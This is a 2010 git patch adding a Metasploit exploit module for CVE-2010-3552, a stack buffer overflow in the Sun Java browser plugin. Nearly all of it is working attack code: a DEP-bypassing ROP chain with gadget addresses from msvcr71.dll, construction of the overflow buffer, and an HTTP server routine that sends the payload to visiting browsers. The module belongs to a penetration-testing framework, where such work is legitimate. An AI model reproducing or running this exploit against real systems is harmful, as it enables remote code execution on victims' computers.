From 3fffd1554964e6ced14505255900b37a086a51b8 Mon Sep 17 00:00:00 2001 From: Joshua Drake Date: Mon, 25 Oct 2010 20:21:41 +0000 Subject: [PATCH] add exploit for cve-2010-3552 (w/dep bypass) git-svn-id: file:///home/svn/framework3/trunk@10819 4d416f70-5f16-0410-b530-b9f4589650da --- .../windows/browser/java_docbase_bof.rb | 254 ++++++++++++++++++ 1 file changed, 254 insertions(+) create mode 100644 modules/exploits/windows/browser/java_docbase_bof.rb diff --git a/modules/exploits/windows/browser/java_docbase_bof.rb b/modules/exploits/windows/browser/java_docbase_bof.rb new file mode 100644 index 0000000000..d0b3298bb2 --- /dev/null +++ b/modules/exploits/windows/browser/java_docbase_bof.rb @@ -0,0 +1,254 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + # + # This module acts as an HTTP server + # + include Msf::Exploit::Remote::HttpServer::HTML + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Sun Java Runtime New Plugin docbase Buffer Overflow', + 'Description' => %q{ + This module exploits a flaw in the new plugin component of the Sun Java + Runtime Environment before v6 Update 22. By specifying specific parameters + to the new plugin, an attacker can cause a stack-based buffer overflow and + execute arbitrary code. + + When the new plugin is invoked with a "launchjnlp" parameter, it will + copy the contents of the "docbase" parameter to a stack-buffer using the + "sprintf" function. A string of 396 bytes is enough to overflow the 256 + byte stack buffer and overwrite some local variables as well as the saved + return address. + + NOTE: The string being copied is first passed through the "WideCharToMultiByte". + Due to this, only characters which have a valid localized multibyte + representation are allowed. Invalid characters will be replaced with + question marks ('?'). + + This vulnerability was originally discovered independently by both Stephen + Fewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn't + been done, all versions since version 6 Update 10 are believed to be affected + by this vulnerability. + + This vulnerability was patched as part of the October 2010 Oracle Patch + release. + }, + 'License' => MSF_LICENSE, + 'Author' => 'jduck', + 'Version' => '$Revision$', + 'References' => + [ + [ 'CVE', '2010-3552' ], + #[ 'OSVDB', '' ], + [ 'BID', '44023' ], + [ 'URL', 'http://blog.harmonysecurity.com/2010/10/oracle-java-ie-browser-plugin-stack.html' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-206/' ], + [ 'URL', 'http://code.google.com/p/skylined/issues/detail?id=23' ], + [ 'URL', 'http://skypher.com/index.php/2010/10/13/issue-2-oracle-java-object-launchjnlp-docbase/' ], + [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html' ], + ], + 'Platform' => 'win', + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread', + 'AutoRunScript' => 'migrate -f', + }, + 'Payload' => + { + 'Space' => 1024, + # The double quote is due to the html, the rest due to utf8 conversion crap. + 'BadChars' => "\x00\x22" + (0x80..0x9f).to_a.pack('C*'), + 'DisableNops' => true, + #'EncoderType' => Msf::Encoder::Type::AlphanumMixed, + 'EncoderOptions' => + { + 'BufferRegister' => 'EAX', + } + }, + 'Targets' => + [ + # Tested OK on: + # JRE 6u21 on XPSP3 and Win7-RTM + # JRE 6u18 on XPSP3 (ugly dialog on IE8) + [ 'Windows Universal (msvcr71.dll ROP)', { } ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Oct 12 2010' + )) + end + + def on_request_uri(cli, request) + + return if ((p = regenerate_payload(cli)) == nil) + + print_status("Sending exploit HTML to #{cli.peerhost}:#{cli.peerport}") + + # ActiveX params + clsid = 'CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA' + var_obj = rand_text_alpha(8+rand(8)) + + + # These addresses are from the bundled msvcr71.dll from JRE 6u21 +=begin +7c340000 7c396000 MSVCR71 (export symbols) C:\Program Files\Java\jre6\bin\MSVCR71.dll +Loaded symbol image file: C:\Program Files\Java\jre6\bin\MSVCR71.dll +Image path: C:\Program Files\Java\jre6\bin\MSVCR71.dll +Image name: MSVCR71.dll +Timestamp: Fri Feb 21 07:42:20 2003 (3E561EAC) +CheckSum: 0005F1E9 +ImageSize: 00056000 +File version: 7.10.3052.4 +Product version: 7.10.3052.4 +=end + + base = 0x7c340000 + rva = { + 'scratch' => 0x4b170, # Scratch space.. + 'scratch2' => 0x4b170 - 0x10, # Scratch space.. + 'import_VA' => 0x3a08c - 0x58, # The import address of HeapCreate (less 0x58, avoid badchars) + 'add_58_eax' => 0xd05e, # add eax, 0x58 / ret + 'pop_eax' => 0x4cc1, # pop eax / ret + 'deref_eax' => 0x130ea, # mov eax, [eax] / ret + 'deref_eax4' => 0xe72b, # mov eax, [eax+4] / ret + 'jmp_eax' => 0x13ac, # push eax / ret + 'jmp_ecx' => 0x6b0e, # jmp ecx + 'pop_edx' => 0x5937, # pop edx / ret + 'adjust_eax' => 0x32ef8, # add eax, 0x80bf / add dh, dh / ret + 'rep_movsd' => 0x363f, # rep movsd / pop edi / pop esi / sub eax, eax / ret + 'esp_to_esi' => 0x32f4f, # push esp / and al, 0x10 / mov [edx], ecx / pop esi / ret + 'switcheroo' => 0x3427, # mov ecx, eax / mov eax, esi / pop esi / ret 0x10 + 'st_eax_ecx' => 0x103c8, # mov [ecx], eax / ret + 'xor_ecx' => 0x1aa5f, # xor ecx, ecx / mov [eax+0xc], ecx / ret 4 + 'set_ecx_fd' => 0x1690b, # mov cl, 0xfe / dec ecx / ret + } + + extra_insn = 'nop' + #extra_insn = 'int 3' + single_op = Metasm::Shellcode.assemble(Metasm::Ia32.new, <<-EOS).encode_string + #{extra_insn} + push ecx + pop edi + ret +EOS + + # This is the ROP stack. + stack = [ + # Load HeapCreate addr from IAT + 'pop_eax', + 0x41414141, # unused space.. + 0x41414141, + 0x41414141, + 0x41414141, + 'import_VA', # becomes eax + 'add_58_eax', + 'deref_eax', + + # call HeapCreate + 'jmp_eax', + 'adjust_eax', # eip after HeapCreate + 0x01040110, # flOptions (gets & with 0x40005) + 0x01010101, # dwInitialSize + 0x01010101, # dwMaximumSize + + # Move esp into esi + 'pop_edx', + 'scratch', # becomes edx + 'esp_to_esi', + + # Store a single-dword stub to our buffer + 'switcheroo', + single_op.unpack('V').first, # becomes esi/eax + 'deref_eax4', + 0x41414141, # more unused space.. + 0x41414141, + 0x41414141, + 0x41414141, + 'st_eax_ecx', + + # Call our dword-stub + 'jmp_ecx', + + # Re-load ESP and save our Heap address to scratch (edx) + 'esp_to_esi', + + # Set ecx to something sane (for memcpy) + 'pop_eax', + 'scratch2', + 'xor_ecx', + 'set_ecx_fd', + 0x41414141, # skipped by ret 0x4 + + # Do the memcpy! + 'rep_movsd', + 0x41414141, # becomes edi + 0x41414141, # becomes esi + + # Re-load our Heap pointer + 'pop_eax', + 'scratch', + 'deref_eax', + + # Adjust it to skip the non-payload parts + 'add_58_eax', + + # Execute it ! + 'jmp_eax', + + # BOOO! + 0x41414141 + ] + + # Replace unused entries with randomness + stack = stack.map { |el| + if el.kind_of? String + base + rva[el] + elsif el == 0x41414141 + rand_text(4).unpack('V').first + else + el + end + }.pack('V*') + + + # Create the overflow buffer + docbase = rand_text(392) + docbase << stack + docbase << rand_text(584 - docbase.length) + docbase << payload.encoded + + # Generate the html page that will trigger the vuln. + html = <<-EOS + +Please wait... + + + + + + + +EOS + + # Pow. + send_response_html(cli, html, + { + 'Content-Type' => 'text/html', + 'Pragma' => 'no-cache' + }) + end + +end